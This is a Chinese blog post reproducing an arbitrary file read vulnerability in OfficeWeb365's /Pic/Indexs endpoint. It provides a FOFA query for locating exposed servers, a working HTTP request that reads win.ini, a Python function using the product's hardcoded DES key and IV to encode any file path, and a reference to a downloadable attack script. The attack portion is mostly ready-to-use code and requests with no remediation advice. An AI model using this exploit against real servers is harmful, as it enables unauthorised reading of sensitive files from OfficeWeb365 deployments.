officeWeb365 Indexs接口存在任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务,包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览,WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,获取服务器敏感信息。

1.漏洞级别

高危

2.漏洞搜索

fofa

复制代码
body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365" 

3.漏洞复现

3.1 简单复现

构造请求包

复制代码
GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

如果漏洞存在即可成功返回数据

其中DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09的值为/.../.../Windows/win.ini,如果需要读取其他文件则需要根据路径生成编码。

这里提供一个python环境下的生成函数,可以根据需要将制定路径生成为DES编码。

python 复制代码
#需要安装加解密库 pip install pycryptodome
from Crypto.Cipher import DES
from Crypto.Util.Padding import pad, unpad
import base64
 
 # 密钥和初始向量
Keys = bytes([102, 16, 93, 156, 78, 4, 218, 32])
Iv = bytes([55, 103, 246, 79, 36, 99, 167, 3])

def encrypt_des(plaintext, key, iv):
    cipher = DES.new(key, DES.MODE_CBC, iv)
    padded_plaintext = pad(plaintext.encode('utf-8'), DES.block_size)
    ciphertext = cipher.encrypt(padded_plaintext)
    return base64.b64encode(ciphertext).decode('utf-8')

# 明文
plaintext = "C:\\windows\\win.ini" 
# 加密
ciphertext = encrypt_des(plaintext, Keys, Iv)
print("加密后的密文:", ciphertext+"09")

将文件C:\windows\win.ini 加密后生成的密文U4MXvYDVuVrybiwjpvXs7R2FZA8nRywM09 带入为imgs的值。可以看到成功获取到文件的内容。

3.2 快捷利用

网上该漏洞很多复现都只简单复现了漏洞,并没有提供获取任意文件的方法,本文提供一个脚本,你可以自行选择文件的地址。

执行

复制代码
python3 office_web365_index_fileread.py  -u url -f c:/windows/system.ini

可以看到成功输出。
注:这里的路径可以使用绝对路径或者相关路径,都是可以的。

文件地址随着文章附赠上了,你也可以在github上搜索同名文档。
感谢阅读,如果有问题,欢迎随时沟通~

相关推荐
Suckerbin2 小时前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全
碳水加碳水9 小时前
Java代码审计实战:XML外部实体注入(XXE)深度解析
java·安全·web安全·代码审计
lingggggaaaa18 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
淮北49421 小时前
计算机网络学习(七、网络安全)
学习·计算机网络·web安全
爱隐身的官人1 天前
新后端漏洞(上)- Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
网络·安全·web安全·spel表达式注入命令执行
星马梦缘1 天前
计算机网络7 第七章 网络安全
网络·计算机网络·安全·web安全·非对称加密·对称加密
weixin_446260851 天前
探索网络安全的利器:theHarvester
安全·web安全
m0_738120721 天前
CTFshow系列——PHP特性Web97-100
开发语言·安全·web安全·php·ctfshow
Suckerbin1 天前
Basic Pentesting: 1靶场渗透
笔记·安全·web安全·网络安全
小楓12012 天前
Web漏洞挖掘篇(二)—信息收集
web安全·网络安全·漏洞挖掘